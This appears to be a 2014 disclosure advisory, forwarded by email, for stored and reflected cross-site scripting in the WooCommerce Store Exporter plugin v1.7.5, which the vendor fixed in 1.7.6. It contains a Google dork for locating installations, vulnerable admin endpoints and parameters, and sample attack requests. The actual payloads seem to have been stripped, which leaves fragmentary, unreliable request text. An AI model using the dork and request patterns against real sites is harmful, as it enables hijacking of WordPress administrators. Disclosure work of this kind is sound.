# Exploit Title: WooCommerce Store Exporter v1.7.5 Stored XSS # Google Dork: inurl:"woocommerce-exporter" # Date: 26/08/2014 # Exploit Author: Mike Manzotti @ Dionach # Vendor Homepage: http://www.visser.com.au/plugins/store-exporter/ # Software Link: http://downloads.wordpress.org/plugin/woocommerce-exporter.zip (Fixed) # Version: v1.7.5 # Vulnerability Disclosure Timeline: 2014-08-25: Discovered vulnerability 2014-08-25: Vendor Notification 2014-08-25: Vendor Response/Feedback 2014-08-26: Vendor Fix/Patch (v 1.7.6) 2014-08-26: Public Disclosure Stored Cross Site Scripting URL FIELDS /wp-admin/admin.php?page=woo_ce&tab=export POST: export_filename POST http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=settings export_filename="&delete_file=0&encoding=UTF-8&timeout=0&delimiter=%2C&category_separator=%7C&bom=1&escape_formatting=all&enable_auto=0&auto_type=products&order_filter_status=&auto_method=archive&enable_cron=0&submit=Save+Changes&action=save-settings Response: " [cid:image005.jpg@01CFC090.5AED79D0] Scenario: An attacker creates a malicious page as shown below and uploads it on a server under attacker's control.
tabs-exportc172f.php
[...]
http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=>
[cid:image015.jpg@01CFC090.5AED79D0]
http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=settings
2) Example
Request:
POST http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=export
dataset=users1be3c
[...]
Scenario:
Similar scenarios could be reproduced as shown in the Stored Cross-site Scripting scenario.
Kind regards,
Mike
______________________________________________________________________
Disclaimer: This e-mail and any attachments are confidential.
It may contain privileged information and is intended for the named
addressee(s) only. It must not be distributed without Dionach Ltd consent.
If you are not the intended recipient, please notify the sender immediately and destroy this e-mail.
Any unauthorised copying, disclosure or distribution of the material in this e-mail is strictly forbidden. Unless expressly stated, opinions in this e-mail are those of the individual sender, and not of Dionach Ltd.
Dionach Ltd, Greenford House, London Road, Wheatley, Oxford OX33 1JH Company Registration No. 03908168, VAT No. GB750661242
______________________________________________________________________